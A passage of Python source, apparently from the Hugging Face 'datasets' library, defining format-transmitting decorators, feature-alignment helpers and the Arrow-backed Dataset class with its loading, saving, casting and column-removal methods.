tf_dataset.prefetch(tf.data.experimental.AUTOTUNE) # Remove a reference to the open Arrow file on delete def cleanup_callback(ref): dataset.__del__() self._TF_DATASET_REFS.remove(ref) self._TF_DATASET_REFS.add(weakref.ref(tf_dataset, cleanup_callback)) return tf_dataset class DatasetTransformationNotAllowedError(Exception): pass def transmit_format(func): """Wrapper for dataset transforms that recreate a new Dataset to transmit the format of the original dataset to the new dataset""" @wraps(func) def wrapper(*args, **kwargs): if 
args: self: "Dataset" = args[0] args = args[1:] else: self: "Dataset" = kwargs.pop("self") # don't use self.format since it returns a list of columns for 'columns' even if self_format_columns is None unformatted_columns = set(self.column_names) - set(self._format_columns or []) self_format = { "type": self._format_type, "format_kwargs": self._format_kwargs, "columns": self._format_columns, "output_all_columns": self._output_all_columns, } # apply actual function out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] # re-apply format to the output for dataset in datasets: new_format = self_format.copy() if new_format["columns"] is not None: # new formatted columns = (columns - previously unformatted columns) # sort the columns to have a deterministic list of columns that we can compare with `out_format` new_format["columns"] = sorted(set(dataset.column_names) - unformatted_columns) out_format = { "type": dataset._format_type, "format_kwargs": dataset._format_kwargs, "columns": sorted(dataset._format_columns) if dataset._format_columns is not None else None, "output_all_columns": dataset._output_all_columns, } if out_format != new_format: # only apply if there's a change not to update the fingerprint for nothing dataset.set_format(**new_format) return out wrapper._decorator_name_ = "transmit_format" return wrapper def transmit_tasks(func): """Wrapper for dataset transforms that recreate a new Dataset to transmit the task templates of the original dataset to the new dataset""" @wraps(func) def wrapper(*args, **kwargs): if args: self: "Dataset" = args[0] args = args[1:] else: self: "Dataset" = kwargs.pop("self") # apply actual function out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] for dataset in datasets: # Remove task templates if a column mapping of the template is no longer valid if self.info.task_templates is not None: dataset.info.task_templates = [ template for template in self.info.task_templates if all(dataset.features.get(k) == self.features.get(k) for k in template.column_mapping.keys()) ] return out wrapper._decorator_name_ = "transmit_tasks" return wrapper def update_metadata_with_features(table: Table, features: Features): """To be used in dataset transforms that modify the features of the dataset, in order to update the features stored in the metadata of its schema.""" features = Features({col_name: features[col_name] for col_name in table.column_names}) if table.schema.metadata is None or "huggingface".encode("utf-8") not in table.schema.metadata: pa_metadata = ArrowWriter._build_metadata(DatasetInfo(features=features)) else: metadata = json.loads(table.schema.metadata["huggingface".encode("utf-8")].decode()) if "info" not in metadata: metadata["info"] = asdict(DatasetInfo(features=features)) else: metadata["info"]["features"] = asdict(DatasetInfo(features=features))["features"] pa_metadata = {"huggingface": json.dumps(metadata)} table = table.replace_schema_metadata(pa_metadata) return table def _check_table(table) -> Table: """We check the table type to make sure it's an instance of :class:`datasets.table.Table`""" if isinstance(table, pa.Table): # for a pyarrow table, we can just consider it as a in-memory table # this is here for backward compatibility return InMemoryTable(table) elif isinstance(table, Table): return table else: raise TypeError(f"Expected a pyarrow.Table or a 
datasets.table.Table object, but got {table}.") def _check_column_names(column_names: List[str]): """Check the column names to make sure they don't contain duplicates.""" counter = Counter(column_names) if not all(count == 1 for count in counter.values()): duplicated_columns = [col for col in counter if counter[col] > 1] raise ValueError(f"The table can't have duplicated columns but columns {duplicated_columns} are duplicated.") def _check_if_features_can_be_aligned(features_list: List[Features]): """Check if the dictionaries of features can be aligned. Two dictonaries of features can be aligned if the keys they share have the same type or some of them is of type `Value("null")`. """ name2feature = {} for features in features_list: for k, v in features.items(): if k not in name2feature or (isinstance(name2feature[k], Value) and name2feature[k].dtype == "null"): name2feature[k] = v for features in features_list: for k, v in features.items(): if not (isinstance(v, Value) and v.dtype == "null") and name2feature[k] != v: raise ValueError( f'The features can\'t be aligned because the key {k} of features {features} has unexpected type - {v} (expected either {name2feature[k]} or Value("null").' ) def _align_features(features_list: List[Features]) -> List[Features]: """Align dictionaries of features so that the keys that are found in multiple dictionaries share the same feature.""" name2feature = {} for features in features_list: for k, v in features.items(): if k not in name2feature or (isinstance(name2feature[k], Value) and name2feature[k].dtype == "null"): name2feature[k] = v return [Features({k: name2feature[k] for k in features.keys()}) for features in features_list] class NonExistentDatasetError(Exception): """Used when we expect the existence of a dataset""" pass class Dataset(DatasetInfoMixin, IndexableMixin, TensorflowDatasetMixin): """A Dataset backed by an Arrow table.""" def __init__( self, arrow_table: Table, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_table: Optional[Table] = None, fingerprint: Optional[str] = None, ): info = info.copy() if info is not None else DatasetInfo() DatasetInfoMixin.__init__(self, info=info, split=split) IndexableMixin.__init__(self) self._data: Table = _check_table(arrow_table) self._indices: Optional[Table] = _check_table(indices_table) if indices_table is not None else None maybe_register_dataset_for_temp_dir_deletion(self) self._format_type: Optional[str] = None self._format_kwargs: dict = {} self._format_columns: Optional[list] = None self._output_all_columns: bool = False self._fingerprint: str = fingerprint # Read metadata if self._data.schema.metadata is not None and "huggingface".encode("utf-8") in self._data.schema.metadata: metadata = json.loads(self._data.schema.metadata["huggingface".encode("utf-8")].decode()) if "info" in metadata and self.info.features is None: # try to load features from the arrow file metadata self._info.features = DatasetInfo.from_dict(metadata["info"]).features if ( "fingerprint" in metadata and self._fingerprint is None ): # try to load fingerprint from the arrow file metadata self._fingerprint = metadata["fingerprint"] # Infer features if None inferred_features = Features.from_arrow_schema(arrow_table.schema) if self.info.features is None: self.info.features = inferred_features else: # make sure the nested columns are in the right order self.info.features = self.info.features.reorder_fields_as(inferred_features) # Infer fingerprint if None if self._fingerprint is None: 
self._fingerprint = generate_fingerprint(self) # Sanity checks if self.features is None: raise ValueError("Features can't be None in a Dataset object") if self._fingerprint is None: raise ValueError("Fingerprint can't be None in a Dataset object") if self.info.features.type != inferred_features.type: raise ValueError( f"External features info don't match the dataset:\nGot\n{self.info.features}\nwith type\n{self.info.features.type}\n\nbut expected something like\n{inferred_features}\nwith type\n{inferred_features.type}" ) if self._indices is not None: if not pa.types.is_unsigned_integer(self._indices.column(0)[0].type): raise ValueError( f"indices must be an Arrow table of unsigned integers, current type is {self._indices.column(0)[0].type}" ) _check_column_names(self._data.column_names) self._data = update_metadata_with_features(self._data, self.features) @classmethod def from_file( cls, filename: str, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_filename: Optional[str] = None, in_memory: bool = False, ) -> "Dataset": """Instantiate a Dataset backed by an Arrow table at filename. Args: filename (:obj:`str`): File name of the dataset. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. indices_filename (:obj:`str`, optional): File names of the indices. in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. Returns: :class:`Dataset` """ table = ArrowReader.read_table(filename, in_memory=in_memory) if indices_filename is not None: indices_pa_table = ArrowReader.read_table(indices_filename, in_memory=in_memory) else: indices_pa_table = None return cls( arrow_table=table, info=info, split=split, indices_table=indices_pa_table, ) @classmethod def from_buffer( cls, buffer: pa.Buffer, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_buffer: Optional[pa.Buffer] = None, ) -> "Dataset": """Instantiate a Dataset backed by an Arrow buffer. Args: buffer (:obj:`pyarrow.Buffer`): Arrow buffer. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. indices_buffer (:obj:`pyarrow.Buffer`, optional): Indices Arrow buffer. Returns: :class:`Dataset` """ table = InMemoryTable.from_buffer(buffer) if indices_buffer is not None: indices_table = InMemoryTable.from_buffer(buffer) else: indices_table = None return cls(table, info=info, split=split, indices_table=indices_table) @classmethod def from_pandas( cls, df: pd.DataFrame, features: Optional[Features] = None, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, ) -> "Dataset": """ Convert :obj:`pandas.DataFrame` to a :obj:`pyarrow.Table` to create a :class:`Dataset`. The column types in the resulting Arrow Table are inferred from the dtypes of the pandas.Series in the DataFrame. In the case of non-object Series, the NumPy dtype is translated to its Arrow equivalent. In the case of `object`, we need to guess the datatype by looking at the Python objects in this Series. Be aware that Series of the `object` dtype don't carry enough information to always lead to a meaningful Arrow type. In the case that we cannot infer a type, e.g. because the DataFrame is of length 0 or the Series only contains None/nan objects, the type is set to null. This behavior can be avoided by constructing explicit features and passing it to this function. 
Args: df (:obj:`pandas.DataFrame`): Dataframe that contains the dataset. features (:class:`Features`, optional): Dataset features. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. Returns: :class:`Dataset` """ if info is not None and features is not None and info.features != features: raise ValueError( f"Features specified in `features` and `info.features` can't be different:\n{features}\n{info.features}" ) features = features if features is not None else info.features if info is not None else None if info is None: info = DatasetInfo() info.features = features table = InMemoryTable.from_pandas(df=df, schema=pa.schema(features.type) if features is not None else None) return cls(table, info=info, split=split) @classmethod def from_dict( cls, mapping: dict, features: Optional[Features] = None, info: Optional[Any] = None, split: Optional[Any] = None, ) -> "Dataset": """ Convert :obj:`dict` to a :obj:`pyarrow.Table` to create a :class:`Dataset`. Args: mapping (:obj:`Mapping`): Mapping of strings to Arrays or Python lists. features (:class:`Features`, optional): Dataset features. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. Returns: :class:`Dataset` """ if info is not None and features is not None and info.features != features: raise ValueError( f"Features specified in `features` and `info.features` can't be different:\n{features}\n{info.features}" ) features = features if features is not None else info.features if info is not None else None if info is None: info = DatasetInfo() info.features = features if features is not None: mapping = features.encode_batch(mapping) mapping = { col: OptimizedTypedSequence(data, type=features.type[col].type if features is not None else None, col=col) for col, data in mapping.items() } pa_table = InMemoryTable.from_pydict(mapping=mapping) return cls(pa_table, info=info, split=split) @staticmethod def from_csv( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, **kwargs, ): """Create Dataset from CSV file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the CSV file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. **kwargs: Keyword arguments to be passed to :meth:`pandas.read_csv`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.csv import CsvDatasetReader return CsvDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, **kwargs ).read() @staticmethod def from_json( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, field: Optional[str] = None, **kwargs, ): """Create Dataset from JSON or JSON Lines file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the JSON or JSON Lines file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. 
features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. field (:obj:`str`, optional): Field name of the JSON file where the dataset is contained in. **kwargs: Keyword arguments to be passed to :class:`JsonConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.json import JsonDatasetReader return JsonDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, field=field, **kwargs, ).read() @staticmethod def from_parquet( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, columns: Optional[List[str]] = None, **kwargs, ): """Create Dataset from Parquet file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the Parquet file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. columns (:obj:`List[str]`, optional): If not None, only these columns will be read from the file. A column name may be a prefix of a nested field, e.g. 'a' will select 'a.b', 'a.c', and 'a.d.e'. **kwargs: Keyword arguments to be passed to :class:`ParquetConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.parquet import ParquetDatasetReader return ParquetDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, columns=columns, **kwargs, ).read() @staticmethod def from_text( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, **kwargs, ): """Create Dataset from text file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the text file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. **kwargs: Keyword arguments to be passed to :class:`TextConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.text import TextDatasetReader return TextDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, **kwargs ).read() def __del__(self): if hasattr(self, "_data"): del self._data if hasattr(self, "_indices"): del self._indices def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): # Here `del` is used to del the pyarrow tables. This properly closes the files used for memory mapped tables self.__del__() def save_to_disk(self, dataset_path: str, fs=None): """ Saves a dataset to a dataset directory, or in a filesystem using either :class:`~filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``. Args: dataset_path (:obj:`str`): Path (e.g. `dataset/train`) or remote URI (e.g. 
`s3://my-bucket/dataset/train`) of the dataset directory where the dataset will be saved to. fs (:class:`~filesystems.S3FileSystem`, ``fsspec.spec.AbstractFileSystem``, optional, defaults ``None``): Instance of the remote filesystem used to download the files from. """ if self.list_indexes(): raise ValueError("please remove all the indexes using `dataset.drop_index` before saving a dataset") dataset = self.flatten_indices() if self._indices is not None else self if is_remote_filesystem(fs): dataset_path = extract_path_from_uri(dataset_path) else: fs = fsspec.filesystem("file") cache_files_paths = [Path(cache_filename["filename"]) for cache_filename in self.cache_files] # Check that the dataset doesn't overwrite iself. It can cause a permission error on Windows and a segfault on linux. if Path(dataset_path, config.DATASET_ARROW_FILENAME) in cache_files_paths: raise PermissionError( f"Tried to overwrite {Path(dataset_path, config.DATASET_ARROW_FILENAME)} but a dataset can't overwrite itself." ) if Path(dataset_path, config.DATASET_INDICES_FILENAME) in cache_files_paths: raise PermissionError( f"Tried to overwrite {Path(dataset_path, config.DATASET_INDICES_FILENAME)} but a dataset can't overwrite itself." ) # Get json serializable state state = { key: dataset.__dict__[key] for key in [ "_fingerprint", "_format_columns", "_format_kwargs", "_format_type", "_indexes", "_output_all_columns", ] } split = dataset.__dict__["_split"] state["_split"] = str(split) if split is not None else split state["_data_files"] = [{"filename": config.DATASET_ARROW_FILENAME}] for k in state["_format_kwargs"].keys(): try: json.dumps(state["_format_kwargs"][k]) except TypeError as e: raise TypeError( str(e) + f"\nThe format kwargs must be JSON serializable, but key '{k}' isn't." ) from None # Get json serializable dataset info dataset_info = asdict(dataset._info) # Save dataset + indices + state + info fs.makedirs(dataset_path, exist_ok=True) with fs.open(Path(dataset_path, config.DATASET_ARROW_FILENAME).as_posix(), "wb") as dataset_file: with ArrowWriter(stream=dataset_file) as writer: writer.write_table(dataset._data) writer.finalize() with fs.open( Path(dataset_path, config.DATASET_STATE_JSON_FILENAME).as_posix(), "w", encoding="utf-8" ) as state_file: json.dump(state, state_file, indent=2, sort_keys=True) with fs.open( Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix(), "w", encoding="utf-8" ) as dataset_info_file: # Sort only the first level of keys, or we might shuffle fields of nested features if we use sort_keys=True sorted_keys_dataset_info = {key: dataset_info[key] for key in sorted(dataset_info)} json.dump(sorted_keys_dataset_info, dataset_info_file, indent=2) logger.info(f"Dataset saved in {dataset_path}") @staticmethod def _build_local_temp_path(uri_or_path: str) -> Path: """ Builds and returns a Path concatenating a local temporary dir with the dir path (or absolute/relative path extracted from the uri) passed. Args: uri_or_path (:obj:`str`): Path (e.g. `"dataset/train"`) or remote URI (e.g. `"s3://my-bucket/dataset/train"`) to concatenate. 
Returns: :class:`Path`: the concatenated path (temp dir + path) """ src_dataset_path = Path(uri_or_path) tmp_dir = get_temporary_cache_files_directory() return Path(tmp_dir, src_dataset_path.relative_to(src_dataset_path.anchor)) @staticmethod def load_from_disk(dataset_path: str, fs=None, keep_in_memory: Optional[bool] = None) -> "Dataset": """ Loads a dataset that was previously saved using :meth:`save_to_disk` from a dataset directory, or from a filesystem using either :class:`~filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``. Args: dataset_path (:obj:`str`): Path (e.g. `"dataset/train"`) or remote URI (e.g. `"s3//my-bucket/dataset/train"`) of the dataset directory where the dataset will be loaded from. fs (:class:`~filesystems.S3FileSystem`, ``fsspec.spec.AbstractFileSystem``, optional, default ``None``): Instance of the remote filesystem used to download the files from. keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section. Returns: :class:`Dataset` or :class:`DatasetDict`: - If `dataset_path` is a path of a dataset directory: the dataset requested. - If `dataset_path` is a path of a dataset dict directory: a ``datasets.DatasetDict`` with each split. """ # copies file from filesystem if it is remote filesystem to local filesystem and modifies dataset_path to temp directory containing local copies fs = fsspec.filesystem("file") if fs is None else fs dataset_dict_json_path = Path(dataset_path, config.DATASETDICT_JSON_FILENAME).as_posix() dataset_info_path = Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix() if not fs.isfile(dataset_info_path) and fs.isfile(dataset_dict_json_path): raise FileNotFoundError( f"No such file or directory: '{dataset_info_path}'. Expected to load a Dataset object, but got a DatasetDict. Please use datasets.load_from_disk instead." 
) if is_remote_filesystem(fs): src_dataset_path = extract_path_from_uri(dataset_path) dataset_path = Dataset._build_local_temp_path(src_dataset_path) fs.download(src_dataset_path, dataset_path.as_posix(), recursive=True) with open( Path(dataset_path, config.DATASET_STATE_JSON_FILENAME).as_posix(), "r", encoding="utf-8" ) as state_file: state = json.load(state_file) with open( Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix(), "r", encoding="utf-8" ) as dataset_info_file: dataset_info = DatasetInfo.from_dict(json.load(dataset_info_file)) dataset_size = estimate_dataset_size( Path(dataset_path, data_file["filename"]) for data_file in state["_data_files"] ) keep_in_memory = keep_in_memory if keep_in_memory is not None else is_small_dataset(dataset_size) table_cls = InMemoryTable if keep_in_memory else MemoryMappedTable arrow_table = concat_tables( table_cls.from_file(Path(dataset_path, data_file["filename"]).as_posix()) for data_file in state["_data_files"] ) split = state["_split"] split = Split(split) if split is not None else split return Dataset( arrow_table=arrow_table, info=dataset_info, split=split, fingerprint=state["_fingerprint"], ) @property def data(self) -> Table: """The Apache Arrow table backing the dataset.""" return self._data @property def cache_files(self) -> List[dict]: """The cache files containing the Apache Arrow table backing the dataset.""" cache_files = list_table_cache_files(self._data) if self._indices is not None: cache_files += list_table_cache_files(self._indices) return [{"filename": cache_filename} for cache_filename in cache_files] @property def num_columns(self) -> int: """Number of columns in the dataset.""" return self._data.num_columns @property def num_rows(self) -> int: """Number of rows in the dataset (same as :meth:`Dataset.__len__`).""" if self._indices is not None: return self._indices.num_rows return self._data.num_rows @property def column_names(self) -> List[str]: """Names of the columns in the dataset.""" return self._data.column_names @property def shape(self) -> Tuple[int, int]: """Shape of the dataset (number of columns, number of rows).""" if self._indices is not None: return (self._indices.num_rows, self._data.num_columns) return self._data.shape def unique(self, column: str) -> List[Any]: """Return a list of the unique elements in a column. This is implemented in the low-level backend and as such, very fast. Args: column (:obj:`str`): Column name (list all the column names with :func:`datasets.Dataset.column_names`). Returns: :obj:`list`: List of unique elements in the given column. """ if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") if self._indices is not None and self._indices.num_rows != self._data.num_rows: dataset = self.flatten_indices() else: dataset = self return dataset._data.column(column).unique().to_pylist() def class_encode_column(self, column: str, include_nulls: bool = False) -> "Dataset": """Casts the given column as :obj:``datasets.features.ClassLabel`` and updates the table. Args: column (`str`): The name of the column to cast (list all the column names with :func:`datasets.Dataset.column_names`) include_nulls (`bool`, default `False`): Whether to include null values in the class labels. If True, the null values will be encoded as the `"None"` class label. .. 
versionadded:: 1.14.2 """ # Sanity checks if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") src_feat = self.features[column] if not isinstance(src_feat, Value): raise ValueError( f"Class encoding is only supported for {Value.__name__} column, and column {column} is {type(src_feat).__name__}." ) if src_feat.dtype != "string" or (include_nulls and None in self.unique(column)): def stringify_column(batch): batch[column] = [ str(sample) if include_nulls or sample is not None else None for sample in batch[column] ] return batch dset = self.map( stringify_column, batched=True, desc="Stringifying the column", ) else: dset = self # Create the new feature class_names = sorted(sample for sample in dset.unique(column) if include_nulls or sample is not None) dst_feat = ClassLabel(names=class_names) def cast_to_class_labels(batch): batch[column] = [ dst_feat.str2int(sample) if include_nulls or sample is not None else None for sample in batch[column] ] return batch dset = dset.map( cast_to_class_labels, batched=True, desc="Casting to class labels", ) new_features = dset.features.copy() new_features[column] = dst_feat dset = dset.cast(new_features) return dset @deprecated() @fingerprint_transform(inplace=True) def dictionary_encode_column_(self, column: str): """Dictionary encode a column. Dictionary encode can reduce the size of a column with many repetitions (e.g. string labels columns) by storing a dictionary of the strings. This only affect the internal storage. .. deprecated:: 1.4.0 Args: column (:obj:`str`): """ if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") casted_schema: pa.Schema = self._data.schema field_index = casted_schema.get_field_index(column) field: pa.Field = casted_schema.field(field_index) casted_field = pa.field(field.name, pa.dictionary(pa.int32(), field.type), nullable=False) casted_schema.set(field_index, casted_field) self._data = self._data.cast(casted_schema) self.info.features = Features.from_arrow_schema(self._data.schema) self._data = update_metadata_with_features(self._data, self.features) @deprecated(help_message="Use Dataset.flatten instead.") @fingerprint_transform(inplace=True) def flatten_(self, max_depth=16): """In-place version of :meth:`Dataset.flatten`. .. deprecated:: 1.4.0 Use :meth:`Dataset.flatten` instead. """ for depth in range(1, max_depth): if any(isinstance(field.type, pa.StructType) for field in self._data.schema): self._data = self._data.flatten() else: break self.info.features = Features.from_arrow_schema(self._data.schema) self._data = update_metadata_with_features(self._data, self.features) logger.info(f'Flattened dataset from depth {depth} to depth { 1 if depth + 1 < max_depth else 'unknown'}.') @fingerprint_transform(inplace=False) def flatten(self, new_fingerprint, max_depth=16) -> "Dataset": """Flatten the table. Each column with a struct type is flattened into one column per struct field. Other columns are left unchanged. Returns: :class:`Dataset`: A copy of the dataset with flattened columns. 
""" dataset = copy.deepcopy(self) for depth in range(1, max_depth): if any(isinstance(field.type, pa.StructType) for field in dataset._data.schema): dataset._data = dataset._data.flatten() else: break dataset.info.features = Features.from_arrow_schema(dataset._data.schema) dataset._data = update_metadata_with_features(dataset._data, dataset.features) logger.info(f'Flattened dataset from depth {depth} to depth {1 if depth + 1 < max_depth else 'unknown'}.') dataset._fingerprint = new_fingerprint return dataset @deprecated(help_message="Use Dataset.cast instead.") def cast_( self, features: Features, batch_size: Optional[int] = 10_000, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 10_000, num_proc: Optional[int] = None, ): """In-place version of :meth:`Dataset.cast`. .. deprecated:: 1.4.0 Use :meth:`Dataset.cast` instead. Args: features (:class:`datasets.Features`): New features to cast the dataset to. The name of the fields in the features must match the current column names. The type of the data must also be convertible from one type to the other. For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset. batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to cast. `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to cast. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. num_proc (`Optional[int]`, default `None`): Number of processes for multiprocessing. By default it doesn't use multiprocessing. 
""" if sorted(features) != sorted(self._data.column_names): raise ValueError( f"The columns in features ({list(features)}) must be identical " f"as the columns in the dataset: {self._data.column_names}" ) type = features.type schema = pa.schema({col_name: type[col_name].type for col_name in self._data.column_names}) dataset = self.with_format("arrow") # capture the PyArrow version here to make the lambda serializable on Windows is_pyarrow_at_least_4 = config.PYARROW_VERSION.major >= 4 dataset = dataset.map( lambda t: t.cast(schema) if is_pyarrow_at_least_4 else cast_with_sliced_list_support(t, schema), batched=True, batch_size=batch_size, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, num_proc=num_proc, features=features, desc="Casting the dataset", ) self._data = dataset._data self._info = dataset._info self._fingerprint = dataset._fingerprint def cast( self, features: Features, batch_size: Optional[int] = 10_000, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 10_000, num_proc: Optional[int] = None, ) -> "Dataset": """ Cast the dataset to a new set of features. Args: features (:class:`datasets.Features`): New features to cast the dataset to. The name of the fields in the features must match the current column names. The type of the data must also be convertible from one type to the other. For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset. batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to cast. `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to cast. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. num_proc (`Optional[int]`, default `None`): Number of processes for multiprocessing. By default it doesn't use multiprocessing. Returns: :class:`Dataset`: A copy of the dataset with casted features. 
""" if sorted(features) != sorted(self._data.column_names): raise ValueError( f"The columns in features ({list(features)}) must be identical " f"as the columns in the dataset: {self._data.column_names}" ) type = features.type schema = pa.schema({col_name: type[col_name].type for col_name in self._data.column_names}) format = self.format dataset = self.with_format("arrow") # capture the PyArrow version here to make the lambda serializable on Windows is_pyarrow_at_least_4 = config.PYARROW_VERSION.major >= 4 dataset = dataset.map( lambda t: t.cast(schema) if is_pyarrow_at_least_4 else cast_with_sliced_list_support(t, schema), batched=True, batch_size=batch_size, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, num_proc=num_proc, features=features, desc="Casting the dataset", ) dataset = dataset.with_format(**format) return dataset @fingerprint_transform(inplace=False) def cast_column(self, column: str, feature: FeatureType, new_fingerprint: str) -> "Dataset": """Cast column to feature for decoding. Args: column (:obj:`str`): Column name. feature (:class:`Feature`): Target feature. Returns: :class:`Dataset` """ if hasattr(feature, "decode_example"): dataset = copy.deepcopy(self) dataset.features[column] = feature dataset._fingerprint = new_fingerprint return dataset else: features = self.features.copy() features[column] = feature return self.cast(features) @deprecated(help_message="Use Dataset.remove_columns instead.") @fingerprint_transform(inplace=True) def remove_columns_(self, column_names: Union[str, List[str]]): """In-place version of :meth:`Dataset.remove_columns`. .. deprecated:: 1.4.0 Use :meth:`Dataset.remove_columns` instead. Args: column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove. """ if isinstance(column_names, str): column_names = [column_names] for column_name in column_names: if column_name not in self._data.column_names: raise ValueError( f"Column name {column_name} not in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) for column_name in column_names: del self._info.features[column_name] self._data = self._data.drop(column_names) self._data = update_metadata_with_features(self._data, self.features) @transmit_tasks @fingerprint_transform(inplace=False) def remove_columns(self, column_names: Union[str, List[str]], new_fingerprint) -> "Dataset": """ Remove one or several column(s) in the dataset and the features associated to them. You can also remove a column using :func:`Dataset.map` with `remove_columns` but the present method is in-place (doesn't copy the data to a new dataset) and is thus faster. Args: column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove. new_fingerprint Returns: :class:`Dataset`: A copy of the dataset object without the columns to remove. """ dataset = copy.deepcopy(self) if isinstance(column_names, str): column_names = [column_names] for column_name in column_names: if column_name not in dataset._data.column_names: raise ValueError( f"Column name {column_name} not in the dataset. 
